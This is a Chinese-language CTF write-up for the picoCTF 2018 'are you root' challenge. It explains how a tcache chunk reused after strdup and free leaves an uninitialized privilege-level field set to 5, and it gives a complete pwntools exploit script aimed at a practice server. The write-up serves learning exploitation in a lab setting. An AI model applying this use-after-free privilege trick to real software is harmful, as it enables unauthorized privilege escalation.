picoctf_2018_are you root:
参考博客:
ha1vk
程序功能到达level5能打出flag,正常运行的话不会让你到达level5
login功能:
strdup()在内部调用了malloc()为变量分配内存
返回一个指针,指向为复制字符串分配的空间
可以看到是申请了两个chunk,且我们的level参数就存在后面
直接说解法:
就是输name的我们填满8个a,然后就可以改到level参数
strdup会把name copy下去,包括level参数,我们free它的话,释放到tcachebin0x20,level参数还在,我们再login的话,如果是0x20大小,就从tcachebin中取,level参数未初始化,还是5。就能接受flag了
exp:
from pwn import *
from LibcSearcher import *
local_file = './PicoCTF_2018_are_you_root'
local_libc = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node4.buuoj.cn',29317 )
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
gdb.attach(r,cmd)
#-----------------------------
sla('> ','login aaaaaaaa'+p64(5))
sla('> ','reset')
sla('> ','login aaaa')
sla('> ','get-flag')
#debug()
r.interactive()
其他:
我u18本地把库与连接改成远端之后调试看:
而如果我用本地的库与链接,登出时,也就是free就有所不同
后面的5直接被改掉了,很是疑惑,